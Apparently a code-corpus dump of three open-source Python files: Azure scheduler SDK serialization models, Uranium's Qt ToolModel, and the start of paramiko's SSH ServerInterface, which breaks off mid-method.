self.frequency = kwargs.get('frequency', None)
self.interval = kwargs.get('interval', None)
class JobProperties(msrest.serialization.Model):
"""JobProperties.
Variables are only populated by the server, and will be ignored when sending a request.
:param start_time: Gets or sets the job start time.
:type start_time: ~datetime.datetime
:param action: Gets or sets the job action.
:type action: ~azure.mgmt.scheduler.models.JobAction
:param recurrence: Gets or sets the job recurrence.
:type recurrence: ~azure.mgmt.scheduler.models.JobRecurrence
:param state: Gets or set the job state. Possible values include: "Enabled", "Disabled",
"Faulted", "Completed".
:type state: str or ~azure.mgmt.scheduler.models.JobState
:ivar status: Gets the job status.
:vartype status: ~azure.mgmt.scheduler.models.JobStatus
"""
_validation = {
'status': {'readonly': True},
}
_attribute_map = {
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'action': {'key': 'action', 'type': 'JobAction'},
'recurrence': {'key': 'recurrence', 'type': 'JobRecurrence'},
'state': {'key': 'state', 'type': 'str'},
'status': {'key': 'status', 'type': 'JobStatus'},
}
def __init__(
self,
**kwargs
):
super(JobProperties, self).__init__(**kwargs)
self.start_time = kwargs.get('start_time', None)
self.action = kwargs.get('action', None)
self.recurrence = kwargs.get('recurrence', None)
self.state = kwargs.get('state', None)
self.status = None
class JobRecurrence(msrest.serialization.Model):
"""JobRecurrence.
:param frequency: Gets or sets the frequency of recurrence (second, minute, hour, day, week,
month). Possible values include: "Minute", "Hour", "Day", "Week", "Month".
:type frequency: str or ~azure.mgmt.scheduler.models.RecurrenceFrequency
:param interval: Gets or sets the interval between retries.
:type interval: int
:param count: Gets or sets the maximum number of times that the job should run.
:type count: int
:param end_time: Gets or sets the time at which the job will complete.
:type end_time: ~datetime.datetime
:param schedule:
:type schedule: ~azure.mgmt.scheduler.models.JobRecurrenceSchedule
"""
_attribute_map = {
'frequency': {'key': 'frequency', 'type': 'str'},
'interval': {'key': 'interval', 'type': 'int'},
'count': {'key': 'count', 'type': 'int'},
'end_time': {'key': 'endTime', 'type': 'iso-8601'},
'schedule': {'key': 'schedule', 'type': 'JobRecurrenceSchedule'},
}
def __init__(
self,
**kwargs
):
super(JobRecurrence, self).__init__(**kwargs)
self.frequency = kwargs.get('frequency', None)
self.interval = kwargs.get('interval', None)
self.count = kwargs.get('count', None)
self.end_time = kwargs.get('end_time', None)
self.schedule = kwargs.get('schedule', None)
class JobRecurrenceSchedule(msrest.serialization.Model):
"""JobRecurrenceSchedule.
:param week_days: Gets or sets the days of the week that the job should execute on.
:type week_days: list[str or ~azure.mgmt.scheduler.models.DayOfWeek]
:param hours: Gets or sets the hours of the day that the job should execute at.
:type hours: list[int]
:param minutes: Gets or sets the minutes of the hour that the job should execute at.
:type minutes: list[int]
:param month_days: Gets or sets the days of the month that the job should execute on. Must be
between 1 and 31.
:type month_days: list[int]
:param monthly_occurrences: Gets or sets the occurrences of days within a month.
:type monthly_occurrences:
list[~azure.mgmt.scheduler.models.JobRecurrenceScheduleMonthlyOccurrence]
"""
_attribute_map = {
'week_days': {'key': 'weekDays', 'type': '[str]'},
'hours': {'key': 'hours', 'type': '[int]'},
'minutes': {'key': 'minutes', 'type': '[int]'},
'month_days': {'key': 'monthDays', 'type': '[int]'},
'monthly_occurrences': {'key': 'monthlyOccurrences', 'type': '[JobRecurrenceScheduleMonthlyOccurrence]'},
}
def __init__(
self,
**kwargs
):
super(JobRecurrenceSchedule, self).__init__(**kwargs)
self.week_days = kwargs.get('week_days', None)
self.hours = kwargs.get('hours', None)
self.minutes = kwargs.get('minutes', None)
self.month_days = kwargs.get('month_days', None)
self.monthly_occurrences = kwargs.get('monthly_occurrences', None)
class JobRecurrenceScheduleMonthlyOccurrence(msrest.serialization.Model):
"""JobRecurrenceScheduleMonthlyOccurrence.
:param day: Gets or sets the day. Must be one of monday, tuesday, wednesday, thursday, friday,
saturday, sunday. Possible values include: "Monday", "Tuesday", "Wednesday", "Thursday",
"Friday", "Saturday", "Sunday".
:type day: str or ~azure.mgmt.scheduler.models.JobScheduleDay
:param occurrence: Gets or sets the occurrence. Must be between -5 and 5.
:type occurrence: int
"""
_attribute_map = {
'day': {'key': 'day', 'type': 'str'},
'occurrence': {'key': 'Occurrence', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(JobRecurrenceScheduleMonthlyOccurrence, self).__init__(**kwargs)
self.day = kwargs.get('day', None)
self.occurrence = kwargs.get('occurrence', None)
class JobStateFilter(msrest.serialization.Model):
"""JobStateFilter.
:param state: Gets or sets the job state. Possible values include: "Enabled", "Disabled",
"Faulted", "Completed".
:type state: str or ~azure.mgmt.scheduler.models.JobState
"""
_attribute_map = {
'state': {'key': 'state', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(JobStateFilter, self).__init__(**kwargs)
self.state = kwargs.get('state', None)
class JobStatus(msrest.serialization.Model):
"""JobStatus.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar execution_count: Gets the number of times this job has executed.
:vartype execution_count: int
:ivar failure_count: Gets the number of times this job has failed.
:vartype failure_count: int
:ivar faulted_count: Gets the number of faulted occurrences (occurrences that were retried and
failed as many times as the retry policy states).
:vartype faulted_count: int
:ivar last_execution_time: Gets the time the last occurrence executed in ISO-8601 format.
Could be empty if job has not run yet.
:vartype last_execution_time: ~datetime.datetime
:ivar next_execution_time: Gets the time of the next occurrence in ISO-8601 format. Could be
empty if the job is completed.
:vartype next_execution_time: ~datetime.datetime
"""
_validation = {
'execution_count': {'readonly': True},
'failure_count': {'readonly': True},
'faulted_count': {'readonly': True},
'last_execution_time': {'readonly': True},
'next_execution_time': {'readonly': True},
}
_attribute_map = {
'execution_count': {'key': 'executionCount', 'type': 'int'},
'failure_count': {'key': 'failureCount', 'type': 'int'},
'faulted_count': {'key': 'faultedCount', 'type': 'int'},
'last_execution_time': {'key': 'lastExecutionTime', 'type': 'iso-8601'},
'next_execution_time': {'key': 'nextExecutionTime', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(JobStatus, self).__init__(**kwargs)
self.execution_count = None
self.failure_count = None
self.faulted_count = None
self.last_execution_time = None
self.next_execution_time = None
class OAuthAuthentication(HttpAuthentication):
"""OAuthAuthentication.
All required parameters must be populated in order to send to Azure.
:param type: Required. Gets or sets the HTTP authentication type.Constant filled by server.
Possible values include: "NotSpecified", "ClientCertificate", "ActiveDirectoryOAuth", "Basic".
:type type: str or ~azure.mgmt.scheduler.models.HttpAuthenticationType
:param secret: Gets or sets the secret, return value will always be empty.
:type secret: str
:param tenant: Gets or sets the tenant.
:type tenant: str
:param audience: Gets or sets the audience.
:type audience: str
:param client_id: Gets or sets the client identifier.
:type client_id: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'secret': {'key': 'secret', 'type': 'str'},
'tenant': {'key': 'tenant', 'type': 'str'},
'audience': {'key': 'audience', 'type': 'str'},
'client_id': {'key': 'clientId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(OAuthAuthentication, self).__init__(**kwargs)
self.type = 'ActiveDirectoryOAuth' # type: str
self.secret = kwargs.get('secret', None)
self.tenant = kwargs.get('tenant', None)
self.audience = kwargs.get('audience', None)
self.client_id = kwargs.get('client_id', None)
class RetryPolicy(msrest.serialization.Model):
"""RetryPolicy.
:param retry_type: Gets or sets the retry strategy to be used. Possible values include: "None",
"Fixed".
:type retry_type: str or ~azure.mgmt.scheduler.models.RetryType
:param retry_interval: Gets or sets the retry interval between retries, specify duration in ISO
8601 format.
:type retry_interval: ~datetime.timedelta
:param retry_count: Gets or sets the number of times a retry should be attempted.
:type retry_count: int
"""
_attribute_map = {
'retry_type': {'key': 'retryType', 'type': 'str'},
'retry_interval': {'key': 'retryInterval', 'type': 'duration'},
'retry_count': {'key': 'retryCount', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(RetryPolicy, self).__init__(**kwargs)
self.retry_type = kwargs.get('retry_type', None)
self.retry_interval = kwargs.get('retry_interval', None)
self.retry_count = kwargs.get('retry_count', None)
class ServiceBusAuthentication(msrest.serialization.Model):
"""ServiceBusAuthentication.
:param sas_key: Gets or sets the SAS key.
:type sas_key: str
:param sas_key_name: Gets or sets the SAS key name.
:type sas_key_name: str
:param type: Gets or sets the authentication type. Possible values include: "NotSpecified",
"SharedAccessKey".
:type type: str or ~azure.mgmt.scheduler.models.ServiceBusAuthenticationType
"""
_attribute_map = {
'sas_key': {'key': 'sasKey', 'type': 'str'},
'sas_key_name': {'key': 'sasKeyName', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ServiceBusAuthentication, self).__init__(**kwargs)
self.sas_key = kwargs.get('sas_key', None)
self.sas_key_name = kwargs.get('sas_key_name', None)
self.type = kwargs.get('type', None)
class ServiceBusBrokeredMessageProperties(msrest.serialization.Model):
"""ServiceBusBrokeredMessageProperties.
:param content_type: Gets or sets the content type.
:type content_type: str
:param correlation_id: Gets or sets the correlation ID.
:type correlation_id: str
:param force_persistence: Gets or sets the force persistence.
:type force_persistence: bool
:param label: Gets or sets the label.
:type label: str
:param message_id: Gets or sets the message ID.
:type message_id: str
:param partition_key: Gets or sets the partition key.
:type partition_key: str
:param reply_to: Gets or sets the reply to.
:type reply_to: str
:param reply_to_session_id: Gets or sets the reply to session ID.
:type reply_to_session_id: str
:param scheduled_enqueue_time_utc: Gets or sets the scheduled enqueue time UTC.
:type scheduled_enqueue_time_utc: ~datetime.datetime
:param session_id: Gets or sets the session ID.
:type session_id: str
:param time_to_live: Gets or sets the time to live.
:type time_to_live: ~datetime.timedelta
:param to: Gets or sets the to.
:type to: str
:param via_partition_key: Gets or sets the via partition key.
:type via_partition_key: str
"""
_attribute_map = {
'content_type': {'key': 'contentType', 'type': 'str'},
'correlation_id': {'key': 'correlationId', 'type': 'str'},
'force_persistence': {'key': 'forcePersistence', 'type': 'bool'},
'label': {'key': 'label', 'type': 'str'},
'message_id': {'key': 'messageId', 'type': 'str'},
'partition_key': {'key': 'partitionKey', 'type': 'str'},
'reply_to': {'key': 'replyTo', 'type': 'str'},
'reply_to_session_id': {'key': 'replyToSessionId', 'type': 'str'},
'scheduled_enqueue_time_utc': {'key': 'scheduledEnqueueTimeUtc', 'type': 'iso-8601'},
'session_id': {'key': 'sessionId', 'type': 'str'},
'time_to_live': {'key': 'timeToLive', 'type': 'duration'},
'to': {'key': 'to', 'type': 'str'},
'via_partition_key': {'key': 'viaPartitionKey', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ServiceBusBrokeredMessageProperties, self).__init__(**kwargs)
self.content_type = kwargs.get('content_type', None)
self.correlation_id = kwargs.get('correlation_id', None)
self.force_persistence = kwargs.get('force_persistence', None)
self.label = kwargs.get('label', None)
self.message_id = kwargs.get('message_id', None)
self.partition_key = kwargs.get('partition_key', None)
self.reply_to = kwargs.get('reply_to', None)
self.reply_to_session_id = kwargs.get('reply_to_session_id', None)
self.scheduled_enqueue_time_utc = kwargs.get('scheduled_enqueue_time_utc', None)
self.session_id = kwargs.get('session_id', None)
self.time_to_live = kwargs.get('time_to_live', None)
self.to = kwargs.get('to', None)
self.via_partition_key = kwargs.get('via_partition_key', None)
class ServiceBusMessage(msrest.serialization.Model):
"""ServiceBusMessage.
:param authentication: Gets or sets the Service Bus authentication.
:type authentication: ~azure.mgmt.scheduler.models.ServiceBusAuthentication
:param brokered_message_properties: Gets or sets the brokered message properties.
:type brokered_message_properties:
~azure.mgmt.scheduler.models.ServiceBusBrokeredMessageProperties
:param custom_message_properties: Gets or sets the custom message properties.
:type custom_message_properties: dict[str, str]
:param message: Gets or sets the message.
:type message: str
:param namespace: Gets or sets the namespace.
:type namespace: str
:param transport_type: Gets or sets the transport type. Possible values include:
"NotSpecified", "NetMessaging", "AMQP".
:type transport_type: str or ~azure.mgmt.scheduler.models.ServiceBusTransportType
"""
_attribute_map = {
'authentication': {'key': 'authentication', 'type': 'ServiceBusAuthentication'},
'brokered_message_properties': {'key': 'brokeredMessageProperties', 'type': 'ServiceBusBrokeredMessageProperties'},
'custom_message_properties': {'key': 'customMessageProperties', 'type': '{str}'},
'message': {'key': 'message', 'type': 'str'},
'namespace': {'key': 'namespace', 'type': 'str'},
'transport_type': {'key': 'transportType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ServiceBusMessage, self).__init__(**kwargs)
self.authentication = kwargs.get('authentication', None)
self.brokered_message_properties = kwargs.get('brokered_message_properties', None)
self.custom_message_properties = kwargs.get('custom_message_properties', None)
self.message = kwargs.get('message', None)
self.namespace = kwargs.get('namespace', None)
self.transport_type = kwargs.get('transport_type', None)
class ServiceBusQueueMessage(ServiceBusMessage):
"""ServiceBusQueueMessage.
:param authentication: Gets or sets the Service Bus authentication.
:type authentication: ~azure.mgmt.scheduler.models.ServiceBusAuthentication
:param brokered_message_properties: Gets or sets the brokered message properties.
:type brokered_message_properties:
~azure.mgmt.scheduler.models.ServiceBusBrokeredMessageProperties
:param custom_message_properties: Gets or sets the custom message properties.
:type custom_message_properties: dict[str, str]
:param message: Gets or sets the message.
:type message: str
:param namespace: Gets or sets the namespace.
:type namespace: str
:param transport_type: Gets or sets the transport type. Possible values include:
"NotSpecified", "NetMessaging", "AMQP".
:type transport_type: str or ~azure.mgmt.scheduler.models.ServiceBusTransportType
:param queue_name: Gets or sets the queue name.
:type queue_name: str
"""
_attribute_map = {
'authentication': {'key': 'authentication', 'type': 'ServiceBusAuthentication'},
'brokered_message_properties': {'key': 'brokeredMessageProperties', 'type': 'ServiceBusBrokeredMessageProperties'},
'custom_message_properties': {'key': 'customMessageProperties', 'type': '{str}'},
'message': {'key': 'message', 'type': 'str'},
'namespace': {'key': 'namespace', 'type': 'str'},
'transport_type': {'key': 'transportType', 'type': 'str'},
'queue_name': {'key': 'queueName', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ServiceBusQueueMessage, self).__init__(**kwargs)
self.queue_name = kwargs.get('queue_name', None)
class ServiceBusTopicMessage(ServiceBusMessage):
"""ServiceBusTopicMessage.
:param authentication: Gets or sets the Service Bus authentication.
:type authentication: ~azure.mgmt.scheduler.models.ServiceBusAuthentication
:param brokered_message_properties: Gets or sets the brokered message properties.
:type brokered_message_properties:
~azure.mgmt.scheduler.models.ServiceBusBrokeredMessageProperties
:param custom_message_properties: Gets or sets the custom message properties.
:type custom_message_properties: dict[str, str]
:param message: Gets or sets the message.
:type message: str
:param namespace: Gets or sets the namespace.
:type namespace: str
:param transport_type: Gets or sets the transport type. Possible values include:
"NotSpecified", "NetMessaging", "AMQP".
:type transport_type: str or ~azure.mgmt.scheduler.models.ServiceBusTransportType
:param topic_path: Gets or sets the topic path.
:type topic_path: str
"""
_attribute_map = {
'authentication': {'key': 'authentication', 'type': 'ServiceBusAuthentication'},
'brokered_message_properties': {'key': 'brokeredMessageProperties', 'type': 'ServiceBusBrokeredMessageProperties'},
'custom_message_properties': {'key': 'customMessageProperties', 'type': '{str}'},
'message': {'key': 'message', 'type': 'str'},
'namespace': {'key': 'namespace', 'type': 'str'},
'transport_type': {'key': 'transportType', 'type': 'str'},
'topic_path': {'key': 'topicPath', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ServiceBusTopicMessage, self).__init__(**kwargs)
self.topic_path = kwargs.get('topic_path', None)
class Sku(msrest.serialization.Model):
"""Sku.
:param name: Gets or set the SKU. Possible values include: "Standard", "Free", "P10Premium",
"P20Premium".
:type name: str or ~azure.mgmt.scheduler.models.SkuDefinition
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Sku, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
class StorageQueueMessage(msrest.serialization.Model):
"""StorageQueueMessage.
:param storage_account: Gets or sets the storage account name.
:type storage_account: str
:param queue_name: Gets or sets the queue name.
:type queue_name: str
:param sas_token: Gets or sets the SAS key.
:type sas_token: str
:param message: Gets or sets the message.
:type message: str
"""
_attribute_map = {
'storage_account': {'key': 'storageAccount', 'type': 'str'},
'queue_name': {'key': 'queueName', 'type': 'str'},
'sas_token': {'key': 'sasToken', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StorageQueueMessage, self).__init__(**kwargs)
self.storage_account = kwargs.get('storage_account', None)
self.queue_name = kwargs.get('queue_name', None)
self.sas_token = kwargs.get('sas_token', None)
self.message = kwargs.get('message', None)
| Azure/azure-sdk-for-python | sdk/scheduler/azure-mgmt-scheduler/azure/mgmt/scheduler/models/_models.py | Python | mit | 43,628 |
# Copyright (c) 2017 Ultimaker B.V.
# Uranium is released under the terms of the LGPLv3 or higher.
from PyQt5.QtCore import Qt
from UM.Application import Application
from UM.Qt.ListModel import ListModel
from UM.PluginRegistry import PluginRegistry
class ToolModel(ListModel):
IdRole = Qt.UserRole + 1
NameRole = Qt.UserRole + 2
IconRole = Qt.UserRole + 3
ToolActiveRole = Qt.UserRole + 4
ToolEnabledRole = Qt.UserRole + 5
DescriptionRole = Qt.UserRole + 6
LocationRole = Qt.UserRole + 7
def __init__(self, parent = None):
super().__init__(parent)
self._controller = Application.getInstance().getController()
self._controller.toolsChanged.connect(self._onToolsChanged)
self._controller.toolEnabledChanged.connect(self._onToolEnabledChanged)
self._controller.activeToolChanged.connect(self._onActiveToolChanged)
self._onToolsChanged()
self.addRoleName(self.IdRole, "id")
self.addRoleName(self.NameRole, "name")
self.addRoleName(self.IconRole, "icon")
self.addRoleName(self.ToolActiveRole, "active")
self.addRoleName(self.ToolEnabledRole, "enabled")
self.addRoleName(self.DescriptionRole, "description")
self.addRoleName(self.LocationRole, "location")
def _onToolsChanged(self):
items = []
tools = self._controller.getAllTools()
for name in tools:
tool_meta_data = PluginRegistry.getInstance().getMetaData(name).get("tool", {})
location = PluginRegistry.getInstance().getMetaData(name).get("location", "")
# Skip tools that are marked as not visible
if "visible" in tool_meta_data and not tool_meta_data["visible"]:
continue
# Optional metadata elements
description = tool_meta_data.get("description", "")
icon_name = tool_meta_data.get("icon", "default.png")
weight = tool_meta_data.get("weight", 0)
enabled = self._controller.getTool(name).getEnabled()
items.append({
"id": name,
"name": tool_meta_data.get("name", name),
"icon": icon_name,
"location": location,
"active": False,
"enabled": enabled,
"description": description,
"weight": weight
})
items.sort(key = lambda t: t["weight"])
self.setItems(items)
def _onActiveToolChanged(self):
active_tool = self._controller.getActiveTool()
for index, value in enumerate(self.items):
if self._controller.getTool(value["id"]) == active_tool:
self.setProperty(index, "active", True)
else:
self.setProperty(index, "active", False)
def _onToolEnabledChanged(self, tool_id, enabled):
index = self.find("id", tool_id)
if index >= 0:
self.setProperty(index, "enabled", enabled)
| thopiekar/Uranium | UM/Qt/Bindings/ToolModel.py | Python | lgpl-3.0 | 3,001 |
# Copyright (C) 2003-2007 Robey Pointer <[email protected]>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
`.ServerInterface` is an interface to override for server support.
"""
import threading
from paramiko import util
from paramiko.common import (
DEBUG, ERROR, OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED, AUTH_FAILED,
AUTH_SUCCESSFUL,
)
from paramiko.py3compat import string_types
class ServerInterface (object):
"""
This class defines an interface for controlling the behavior of Paramiko
in server mode.
Methods on this class are called from Paramiko's primary thread, so you
shouldn't do too much work in them. (Certainly nothing that blocks or
sleeps.)
"""
def check_channel_request(self, kind, chanid):
"""
Determine if a channel request of a given type will be granted, and
return ``OPEN_SUCCEEDED`` or an error code. This method is
called in server mode when the client requests a channel, after
authentication is complete.
If you allow channel requests (and an ssh server that didn't would be
useless), you should also override some of the channel request methods
below, which are used to determine which services will be allowed on
a given channel:
- `check_channel_pty_request`
- `check_channel_shell_request`
- `check_channel_subsystem_request`
- `check_channel_window_change_request`
- `check_channel_x11_request`
- `check_channel_forward_agent_request`
The ``chanid`` parameter is a small number that uniquely identifies the
channel within a `.Transport`. A `.Channel` object is not created
unless this method returns ``OPEN_SUCCEEDED`` -- once a
`.Channel` object is created, you can call `.Channel.get_id` to
retrieve the channel ID.
The return value should either be ``OPEN_SUCCEEDED`` (or
``0``) to allow the channel request, or one of the following error
codes to reject it:
- ``OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED``
- ``OPEN_FAILED_CONNECT_FAILED``
- ``OPEN_FAILED_UNKNOWN_CHANNEL_TYPE``
- ``OPEN_FAILED_RESOURCE_SHORTAGE``
The default implementation always returns
``OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED``.
:param str kind:
the kind of channel the client would like to open (usually
``"session"``).
:param int chanid: ID of the channel
:return: an `int` success or failure code (listed above)
"""
return OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def get_allowed_auths(self, username):
"""
Return a list of authentication methods supported by the server.
This list is sent to clients attempting to authenticate, to inform them
of authentication methods that might be successful.
The "list" is actually a string of comma-separated names of types of
authentication. Possible values are ``"password"``, ``"publickey"``,
and ``"none"``.
The default implementation always returns ``"password"``.
:param str username: the username requesting authentication.
:return: a comma-separated `str` of authentication types
"""
return 'password'
def check_auth_none(self, username):
"""
Determine if a client may open channels with no (further)
authentication.
Return ``AUTH_FAILED`` if the client must authenticate, or
``AUTH_SUCCESSFUL`` if it's okay for the client to not
authenticate.
The default implementation always returns ``AUTH_FAILED``.
:param str username: the username of the client.
:return:
``AUTH_FAILED`` if the authentication fails; ``AUTH_SUCCESSFUL`` if
it succeeds.
:rtype: int
"""
return AUTH_FAILED
def check_auth_password(self, username, password):
"""
Determine if a given username and password supplied by the client is
acceptable for use in authentication.
Return ``AUTH_FAILED`` if the password is not accepted,
``AUTH_SUCCESSFUL`` if the password is accepted and completes
the authentication, or ``AUTH_PARTIALLY_SUCCESSFUL`` if your
authentication is stateful, and this key is accepted for
authentication, but more authentication is required. (In this latter
case, `get_allowed_auths` will be called to report to the client what
options it has for continuing the authentication.)
The default implementation always returns ``AUTH_FAILED``.
:param str username: the username of the authenticating client.
:param str password: the password given by the client.
:return:
``AUTH_FAILED`` if the authentication fails; ``AUTH_SUCCESSFUL`` if
it succeeds; ``AUTH_PARTIALLY_SUCCESSFUL`` if the password auth is
successful, but authentication must continue.
:rtype: int
"""
return AUTH_FAILED
def check_auth_publickey(self, username, key):
"""
Determine if a given key supplied by the client is acceptable for use
in authentication. You should override this method in server mode to
check the username and key and decide if you would accept a signature
made using this key.
Return ``AUTH_FAILED`` if the key is not accepted,
``AUTH_SUCCESSFUL`` if the key is accepted and completes the
authentication, or ``AUTH_PARTIALLY_SUCCESSFUL`` if your
authentication is stateful, and this password is accepted for
authentication, but more authentication is required. (In this latter
case, `get_allowed_auths` will be called to report to the client what
options it has for continuing the authentication.)
Note that you don't have to actually verify any key signtature here.
If you're willing to accept the key, Paramiko will do the work of
verifying the client's signature.
The default implementation always returns ``AUTH_FAILED``.
:param str username: the username of the authenticating client
:param .PKey key: the key object provided by the client
:return:
``AUTH_FAILED`` if the client can't authenticate with this key;
``AUTH_SUCCESSFUL`` if it can; ``AUTH_PARTIALLY_SUCCESSFUL`` if it
can authenticate with this key but must continue with
authentication
:rtype: int
"""
return AUTH_FAILED
def check_auth_interactive(self, username, submethods):
"""
Begin an interactive authentication challenge, if supported. You
should override this method in server mode if you want to support the
``"keyboard-interactive"`` auth type, which requires you to send a
series of questions for the client to answer.
Return ``AUTH_FAILED`` if this auth method isn't supported. Otherwise,
you should return an `.InteractiveQuery` object containing the prompts
and instructions for the user. The response will be sent via a call
to `check_auth_interactive_response`.
The default implementation always returns ``AUTH_FAILED``.
:param str username: the username of the authenticating client
:param str submethods:
a comma-separated list of methods preferred by the client (usually
empty)
:return:
``AUTH_FAILED`` if this auth method isn't supported; otherwise an
object containing queries for the user
:rtype: int or `.InteractiveQuery`
"""
return AUTH_FAILED
def check_auth_interactive_response(self, responses):
"""
Continue or finish an interactive authentication challenge, if
supported. You should override this method in server mode if you want
to support the ``"keyboard-interactive"`` auth type.
Return ``AUTH_FAILED`` if the responses are not accepted,
``AUTH_SUCCESSFUL`` if the responses are accepted and complete
the authentication, or ``AUTH_PARTIALLY_SUCCESSFUL`` if your
authentication is stateful, and this set of responses is accepted for
authentication, but more authentication is required. (In this latter
case, `get_allowed_auths` will be called to report to the client what
options it has for continuing the authentication.)
If you wish to continue interactive authentication with more questions,
you may return an `.InteractiveQuery` object, which should cause the
client to respond with more answers, calling this method again. This
cycle can continue indefinitely.
The default implementation always returns ``AUTH_FAILED``.
:param responses: list of `str` responses from the client
:return:
``AUTH_FAILED`` if the authentication fails; ``AUTH_SUCCESSFUL`` if
it succeeds; ``AUTH_PARTIALLY_SUCCESSFUL`` if the interactive auth
is successful, but authentication must continue; otherwise an
object containing queries for the user
:rtype: int or `.InteractiveQuery`
"""
return AUTH_FAILED
def check_auth_gssapi_with_mic(self, username,
gss_authenticated=AUTH_FAILED,
cc_file=None):
"""
Authenticate the given user to the server if he is a valid krb5
principal.
:param str username: The username of the authenticating client
:param int gss_authenticated: The result of the krb5 authentication
:param str cc_filename: The krb5 client credentials cache filename
:return: ``AUTH_FAILED`` if the user is not authenticated otherwise
``AUTH_SUCCESSFUL``
:rtype: int
:note: Kerberos credential delegation is not supported.
:see: `.ssh_gss`
:note: : We are just checking in L{AuthHandler} that the given user is
a valid krb5 principal!
We don't check if the krb5 principal is allowed to log in on
the server, because there is no way to do that in python. So
if you develop your own SSH server with paramiko for a cetain
plattform like Linux, you should call C{krb5_kuserok()} in
your local kerberos library to make sure that the
krb5_principal has an account on the server and is allowed to
log in as a user.
:see: http://www.unix.com/man-page/all/3/krb5_kuserok/
"""
if gss_authenticated == AUTH_SUCCESSFUL:
return AUTH_SUCCESSFUL
return AUTH_FAILED
def check_auth_gssapi_keyex(self, username,
gss_authenticated=AUTH_FAILED,
cc_file=None):
"""
Authenticate the given user to the server if he is a valid krb5
principal and GSS-API Key Exchange was performed.
If GSS-API Key Exchange was not performed, this authentication method
won't be available.
:param str username: The username of the authenticating client
:param int gss_authenticated: The result of the krb5 authentication
:param str cc_filename: The krb5 client credentials cache filename
:return: ``AUTH_FAILED`` if the user is not authenticated otherwise
``AUTH_SUCCESSFUL``
:rtype: int
:note: Kerberos credential delegation is not supported.
:see: `.ssh_gss` `.kex_gss`
:note: : We are just checking in L{AuthHandler} that the given user is
a valid krb5 principal!
We don't check if the krb5 principal is allowed to log in on
the server, because there is no way to do that in python. So
if you develop your own SSH server with paramiko for a cetain
plattform like Linux, you should call C{krb5_kuserok()} in
your local kerberos library to make sure that the
krb5_principal has an account on the server and is allowed
to log in as a user.
:see: http://www.unix.com/man-page/all/3/krb5_kuserok/
"""
if gss_authenticated == AUTH_SUCCESSFUL:
return AUTH_SUCCESSFUL
return AUTH_FAILED
def enable_auth_gssapi(self):
"""
Overwrite this function in your SSH server to enable GSSAPI
authentication.
The default implementation always returns false.
:returns bool: Whether GSSAPI authentication is enabled.
:see: `.ssh_gss`
"""
UseGSSAPI = False
return UseGSSAPI
def check_port_forward_request(self, address, port):
"""
Handle a request for port forwarding. The client is asking that
connections to the given address and port be forwarded back across
this ssh connection. An address of ``"0.0.0.0"`` indicates a global
address (any address associated with this server) and a port of ``0``
indicates that no specific port is requested (usually the OS will pick
a port).
The default implementation always returns ``False``, rejecting the
port forwarding request. If the request is accepted, you should return
the port opened for listening.
:param str address: the requested address
:param int port: the requested port
:return:
the port number (`int`) that was opened for listening, or ``False``
to reject
"""
return False
def cancel_port_forward_request(self, address, port):
"""
The client would like to cancel a previous port-forwarding request.
If the given address and port is being forwarded across this ssh
connection, the port should be closed.
:param str address: the forwarded address
:param int port: the forwarded port
"""
pass
def check_global_request(self, kind, msg):
"""
Handle a global request of the given ``kind``. This method is called
in server mode and client mode, whenever the remote host makes a global
request. If there are any arguments to the request, they will be in
``msg``.
There aren't any useful global requests defined, aside from port
forwarding, so usually this type of request is an extension to the
protocol.
If the request was successful and you would like to return contextual
data to the remote host, return a tuple. Items in the tuple will be
sent back with the successful result. (Note that the items in the
tuple can only be strings, ints, longs, or bools.)
The default implementation always returns ``False``, indicating that it
does not support any global requests.
.. note:: Port forwarding requests are handled separately, in
`check_port_forward_request`.
:param str kind: the kind of global request being made.
:param .Message msg: any extra arguments to the request.
:return:
``True`` or a `tuple` of data if the request was granted; ``False``
otherwise.
"""
return False
# ...Channel requests...
def check_channel_pty_request(
self, channel, term, width, height, pixelwidth, pixelheight,
modes):
"""
Determine if a pseudo-terminal of the given dimensions (usually
requested for shell access) can be provided on the given channel.
The default implementation always returns ``False``.
:param .Channel channel: the `.Channel` the pty request arrived on.
:param str term: type of terminal requested (for example, ``"vt100"``).
:param int width: width of screen in characters.
:param int height: height of screen in characters.
:param int pixelwidth:
width of screen in pixels, if known (may be ``0`` if unknown).
:param int pixelheight:
height of screen in pixels, if known (may be ``0`` if unknown).
:return:
``True`` if the pseudo-terminal has been allocated; ``False``
otherwise.
"""
return False
def check_channel_shell_request(self, channel):
"""
Determine if a shell will be provided to the client on the given
channel. If this method returns ``True``, the channel should be
connected to the stdin/stdout of a shell (or something that acts like
a shell).
The default implementation always returns ``False``.
:param .Channel channel: the `.Channel` the request arrived on.
:return:
``True`` if this channel is now hooked up to a shell; ``False`` if
a shell can't or won't be provided.
"""
return False
def check_channel_exec_request(self, channel, command):
"""
